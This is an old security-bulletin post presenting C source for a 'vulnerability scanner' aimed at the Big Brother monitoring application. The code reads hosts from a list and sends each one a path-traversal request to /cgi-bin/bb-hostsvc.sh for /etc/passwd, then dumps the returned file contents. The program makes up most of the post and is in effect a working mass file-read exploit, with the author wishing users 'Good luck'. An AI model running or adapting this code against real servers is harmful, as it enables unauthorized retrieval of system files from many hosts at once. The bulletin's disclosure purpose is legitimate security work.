Subject: [TOOL] Big Brother vulnerability scanner
Date: Tue, 25 Jul 2000 17:17:16 +0200

          Big Brother vulnerability scanner
--------------------------------------------------------------------------------

DETAILS

We reported in the past a few security vulnerabilities in the Big Brother
application. The following is a utility that can be used to scan hosts
that use the Big Brother for the mentioned vulnerabilities.

The vulnerabilities this scanner tests for are described in the following
articles:

<http://www.securiteam.com/securitynews/Two_new_Big_Brother_vulnerabilities.html> Two new Big Brother vulnerabilities

<http://www.securiteam.com/securitynews/Big_Brother_allows_remote_command_execution.html> Big Brother allows remote command execution

Source Code:
/*
 *
 * 2000-07-11
 *
 * Ripped from  phfscan.c
 *      Big Brother Vulnarability scanner.
 * Scans for /cgi-bin/bb-hostsvc.sh.
 * If it exists you might be able to read files from
 * the system. Good luck.
 *
 *
 *       Author:  Safety@IRCnet who also discovered the bug.
 *         Safety@LinuxMail.ORG
 *
 *
 *       Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
 *                Bjurr, Metoo, and everyone else who think they should
 *   be on this list.
 *
 * Special Thanks goes to Loki who are going to host and design
 * my homepage.
 *
 *
 * Usage:
 *
 *       ./bbscan < hostlist > outputfile
 *
 */

#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>

int FLAG = 1;
int Call(int signo)
{
 FLAG = 0;
}

main (int argc, char *argv[])
{
  char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  int outsocket, serv_len, len,X,c,outfd;
  struct hostent *nametocheck;
  struct sockaddr_in serv_addr;
  struct in_addr outgoing;

  char bbvuln[]="GET
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";

  while(fgets(hosta,100,stdin))
    {
      if(hosta[0] == '\0')
        break;
      hosta[strlen(hosta) -1] = '\0';
      write(1,hosta,strlen(hosta)*sizeof(char));
        write(1,"\n",sizeof(char));
      outsocket = socket (AF_INET, SOCK_STREAM, 0);
      memset (&serv_addr, 0, sizeof (serv_addr));
      serv_addr.sin_family = AF_INET;

      nametocheck = gethostbyname (hosta);

      /* Ugly stuff to get host name into inet_ntoa form */
      (void *) memcpy (&outgoing.s_addr,
nametocheck->h_addr_list[0],
                       sizeof (outgoing.s_addr));
      strncpy(host, inet_ntoa (outgoing), 100);
      serv_addr.sin_addr.s_addr = inet_addr (host);
      serv_addr.sin_port = htons (80);
      signal(SIGALRM,Call);
      FLAG = 1;

      alarm(10);

      X=connect (outsocket, (struct sockaddr *) &serv_addr,
sizeof (serv_addr));
      alarm(0);

      if(FLAG == 1 && X==0){
       write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char));
       while((X=read(outsocket,FileBuf,8096))!=0)
          write(1,FileBuf,X);
        }
      close (outsocket);
    }
  return 0;
}

ADDITIONAL INFORMATION

The information has been provided by  <mailto:safety@LINUXMAIL.ORG> Marcus
Danielsson.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.